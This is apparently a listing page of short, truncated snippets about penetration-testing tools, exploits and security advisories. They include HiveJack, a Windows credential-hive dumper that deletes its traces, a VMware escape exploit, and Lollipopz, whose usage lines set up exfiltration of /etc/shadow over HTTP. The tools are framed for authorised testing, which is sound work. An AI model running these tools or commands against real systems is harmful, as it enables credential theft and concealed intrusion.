HiveJack - This Tool Can Be Used During Internal Penetration Testing To Dump Windows Credentials From An Already-Compromised Host
This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump the SYSTEM, SECURITY and SAM registry hives and, once they are copied to the attacker machine, provides an option to delete these files to clear the trace. Often, this i...
pentest-wiki
This repository is an information gathering library for penetration testers/researchers. It contains various tools and documentation for gathering information about a target organization, including IP analysis, whois analysis, and social media research. The library includes bookmarks for various...
Information_Collection_Handbook
Handbook of information collection for penetration testing...
Facebook Launches 'Discover,' A Secure Proxy to Browse the Internet for Free
More than six years after Facebook launched its ambitious Free Basics program to bring the Internet to the masses, the social network is back at it again with a new zero-rating initiative called Discover. The service, available as a mobile web and Android app, allows users to browse the Internet...
Brave Software: HTTP Request Smuggling
When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to "smuggle" a request to one device without the other device being awa...
Invoker - Penetration Testing Utility
Penetration testing utility. The goal is to use this tool when access to some Windows OS features through GUI is restricted. Some features require administrative privileges. Capabilities: invoke the Command Prompt and PowerShell, download a file, schedule a task, add a registry key, connect to a...
Trend Micro’s Top Ten MITRE Evaluation Considerations
The introduction of the MITRE ATT&CK evaluations is a welcome addition to the third-party testing arena. The ATT&CK framework, and the evaluations in particular, have gone a long way in helping advance the security industry as a whole, and the individual security products serving the market...
TestLink Input Validation Error Vulnerability
TestLink is a set of open source software for managing the software testing process and providing statistical analysis. An input validation error vulnerability exists in TestLink. Further details of the vulnerability are not available at this time...
信息收集
This repository is an information collection tool for penetration testing and vulnerability assessment. It is a collection of scripts and tools for gathering information about a target system or network. The repository is written in Python and includes various modules for different tasks such as...
S3Reverse - Converts The Various S3 Bucket Formats Into One Format
S3Reverse converts the various S3 bucket formats into one format, for bug bounty and security testing. Install: $ go get -u github.com/hahwul/s3reverse. Usage: input options, basic usage...
vmware_escape
This is an exploit module for VMware Workstation prior to version 12.5.5. The exploit targets a vulnerability in the way VMware handles certain types of memory access, allowing an attacker to execute arbitrary code on the host system. The exploit is designed to be used by an attacker who has gain...
Acronis: Denial of Service in anti_ransomware_service.exe via logs files
antiransomwareservice.exe keeps a log in a folder where any unprivileged user has write permissions. The logs are generated in a predictable pattern, allowing the unprivileged user to create a hardlink from the not-yet-created log file to the antiransomwareservice itself. On reboot, this forces...
Getting ATT&CKed By A Cozy Bear And Being Really Happy About It: What MITRE Evaluations Are, and How To Read Them
Full disclosure: I am a security product testing nerd. I’ve been following the MITRE ATT&CK Framework for a while, and this week the results were released of the most recent evaluation using APT29 otherwise known as COZY BEAR. First, here’s a snapshot of the Trend eval results as I understand the...
metasploit-framework
This is a Metasploit Framework repository. The framework is a penetration testing tool that allows users to create and execute exploits against various targets. The repository contains a wide range of modules, including exploits, payloads, and auxiliary tools. The framework is written in Ruby and...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
CVE-2020-0796 Remote Code Execution POC. (c) 2020 ZecOps, Inc...
Crescendo - A Swift Based, Real Time Event Viewer For macOS - It Utilizes Apple's Endpoint Security Framework
Crescendo is a Swift-based, real time event viewer for macOS. It utilizes Apple's Endpoint Security Framework. Getting Started: Apple has introduced some new security mechanisms that we need to enable to get Crescendo running. 1. Ensure that you have moved the app to your /Applications director o...
Oracle Application Testing Suite (Apr 2020 CPU)
The version of Oracle Application Testing Suite installed on the remote host is affected by a Server Side Request Forgery (SSRF) vulnerability in the Oracle FLEXCUBE Private Banking product of the Oracle Financial Services Applications component (Core Apache Axis). The supported versions which are...
Design/Logic Flaw
An Insecure Direct Object Reference (IDOR) vulnerability in the Change Password feature of Subex ROC Partner Settlement 10.5 allows remote authenticated users to achieve account takeover via manipulation of POST parameters. NOTE: This vulnerability may only affect a testing version of the applicati...
metasploit-framework
This is an offensive security repository for the Metasploit Framework. It is a collection of Ruby code that provides a framework for developing and executing exploits, as well as a platform for testing and validating vulnerabilities. The repository contains a wide range of modules and tools for various tasks,...
Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities
Data exfiltration utility used for testing the detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To: /etc/shadow via HTTP GET requests. Server: ./lollipopz-cli.py -m lollipopz.methods.http.paramcipher.GETServer -lp 80 -o output.log. Client: $ ./lollipopz-cli.py...